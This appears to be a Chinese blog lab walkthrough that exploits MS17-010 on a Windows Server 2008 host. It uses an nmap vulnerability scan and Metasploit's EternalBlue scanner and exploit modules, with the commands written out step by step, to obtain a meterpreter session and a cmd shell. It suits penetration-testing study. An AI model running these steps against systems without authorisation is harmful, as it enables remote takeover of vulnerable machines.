实验环境:
攻击机:kali linux
靶机:win server 2008 192.168.2.133
步骤:
1.使用nmap 扫描:
Nmap -sV -Pn --script=vuln 192.168.2.133
存在ms17-010漏洞

2.打开 msfconsole搜索ms17-010模块

3.use 进入模块auxiliary/scanner/smb/smb_ms17_010再次核对漏洞是否可以利用,show options ,yes是否需要配置的地方

4.需要设置靶机IP,set rhosts 192.168.2.133

5.执行run或者exploit (进行第二次扫描确定是否存在)

6.扫描没问题出现5图片里面的内容说明可以利用,输入show exploit进入攻击模块
![]()
7.使用 use exploit/windows/smb/ms17_010_eternalblue进入exp

8.同样也要设置靶机ip,使用show option查看需要配置的地方

9.使用set rhosts 192.168.2.133 设置目标ip

10.配置好直接run 或者exploit开始攻击

11.出现meterpreter > 说明成功了

12.输入shell得到cmd权限

13.进入cmd后乱码,输入chcp 65001 设置编码


利用MS17-010漏洞进行渗透测试实战
本文详细记录了一次针对WinServer2008系统的MS17-010漏洞扫描与利用过程。首先使用nmap确认漏洞存在,然后在Metasploit中选择相应模块进行配置和攻击,最终成功获取meterpreter shell,实现了cmd权限的获取。
1771

被折叠的 条评论
为什么被折叠?



